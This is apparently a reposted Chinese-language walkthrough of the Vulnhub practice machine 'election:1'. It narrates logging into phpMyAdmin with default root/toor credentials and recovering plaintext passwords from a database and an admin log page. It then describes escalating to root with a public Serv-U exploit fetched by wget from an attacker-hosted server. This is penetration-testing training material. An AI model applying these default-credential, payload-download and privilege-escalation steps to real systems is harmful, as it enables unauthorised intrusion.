点击上方蓝字关注我们
0x00:靶机介绍
这次的靶机是靶机是election:1下载地址是http://www.vulnhub.com/entry/election-1,503/。
号称有OSCP中等难度。总结来说就是phpmyadmin 弱密码登录,到处转挖信息,SSH登录最后一个CVE漏洞提权。
0x01:信息收集
还是一如既往的python autorecon摸鱼启动等做完以后才发觉居然也开了139和445端口。默认有22和80端口。
Gobuster居然扫到phpinfo, phpmyadmin这些稀客,还有个robots.txt的文件
这里先看看robots.txt,第一眼看到wordpress我还以为是个CMS站点渗透结果太天真了。
打开页面一看是个投票的网站。。。。。
这里顺便用dirsearch扫到一个admin后台等下可以过去瞅瞅
0x02:弱密码溜进phpmyadmin挖掘信息
打开phpmyadmin这里一开始我是rootroot尝试失败,然后换成root toor就直接登录进去了还没缓过神来就进去了。。。。
在来到tb_panitia这里看到有个love的账号密码先解密,等下也许会用到
最后得到一个密码Zxc123!@#
此时去到我们的/admin后台输入唯一能找到的ID 1234 然后输入刚才解密出来的密码
成功进入后台。
0x03:挖掘后台信息
这个后台其实设置的比较简单,连文件管理功能都没有裂开。。。.直到我点开Settings,有个systeminfo 里面有个view LOGS
哦吼又找到一个密码有点像用户可以考虑SSH连接
登录成功
0x04:提权
这里用find找特殊权限的时候居然看到有一个Serv-U
这里去到它的目录下可以看到波版本信息为15.1
再用searchsploit Serv-U找到一个<15.1.7的通杀后面也看到应该是一个通杀CVE脚本来的
这里在kali本地开启波python共享模式把相关PAYLOAD传过去
然后在靶机上用wget http://kali IP:8082 把它下载过来
最后根据exploitdb的使用方法绝杀一步到位提权变成root
原文始发于微信公众号(神隐攻防实验室):Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论